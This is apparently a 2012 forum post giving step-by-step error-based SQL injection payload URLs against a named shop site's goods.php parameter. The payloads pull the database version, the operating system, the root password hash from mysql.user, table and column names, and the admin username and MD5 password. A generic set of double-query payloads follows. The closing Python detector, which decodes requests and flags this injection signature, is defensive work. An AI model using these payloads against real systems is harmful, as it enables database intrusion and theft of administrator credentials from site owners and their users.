Blind injection details

OP, posted on 2012-9-5 14:59:30

Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23


user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
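Every payload above rests on the same MySQL behaviour: using count(*) together with floor(rand()*2) as the GROUP BY key makes the server raise a duplicate-entry error whose message carries the concatenated value. The detector below is an added example, not part of the original post: it URL-decodes request lines, rewrites the char()/0x literals into readable strings so an analyst can see which user, schema or table a request named, and flags only requests that carry the full count(*)/floor(rand(...)*2)/GROUP BY combination. The request lines it runs on are constructed samples, and inspect_request and scan are names chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log request lines (not taken from the original post).
SAMPLE_REQUESTS = [
    "GET /goods.php?id=352&wsid=1 HTTP/1.1",
    "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1",
    "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1",
    "GET /item.php?uid=-1%20and(select%201%20from(select%20count(*),concat((select%20version()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1",
]

# The duplicate-key trick needs all three pieces together: count(*), floor(rand()*2)
# (or rand(0)) and GROUP BY on the concatenated alias; requiring the combination
# keeps a plain "group by" or "rand()" in a legitimate query from raising an alert.
DUPLICATE_KEY_SIG = re.compile(
    r"count\(\*\).*?floor\(\s*rand\(\s*\d*\s*\)\s*\*\s*2\s*\).*?group\s+by",
    re.IGNORECASE | re.DOTALL,
)
CHAR_CALL = re.compile(r"char\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)
HEX_LIT = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def normalize(raw_query: str) -> str:
    """URL-decode once and collapse whitespace so the signature regex is stable."""
    return re.sub(r"\s+", " ", unquote_plus(raw_query))


def decode_literals(sql: str) -> str:
    """Rewrite char(114,...) and 0x.. literals as quoted strings so an analyst can
    read which user, schema or table the payload names (char(114,111,111,116) -> 'root')."""
    def char_repl(m):
        return "'" + bytes(int(c) for c in m.group(1).split(",")).decode("latin-1") + "'"

    def hex_repl(m):
        digits = m.group(1)
        if len(digits) % 2:  # odd length cannot be a byte string; leave it untouched
            return m.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"

    return HEX_LIT.sub(hex_repl, CHAR_CALL.sub(char_repl, sql))


def inspect_request(line: str) -> dict:
    """Parse 'METHOD /path?query HTTP/x' and report whether the query carries the signature."""
    parts = line.split(" ")
    target = parts[1] if len(parts) > 1 else line
    decoded = decode_literals(normalize(target.partition("?")[2]))
    return {"hit": DUPLICATE_KEY_SIG.search(decoded) is not None, "decoded": decoded}


def scan(lines):
    """Return the indexes of the request lines carrying the signature."""
    return [i for i, line in enumerate(lines) if inspect_request(line)["hit"]]
```

The decoded field is what belongs in the alert: for the third sample it reads `... where User='root' ...`, which tells the responder the request went after the mysql.user hash rather than application data.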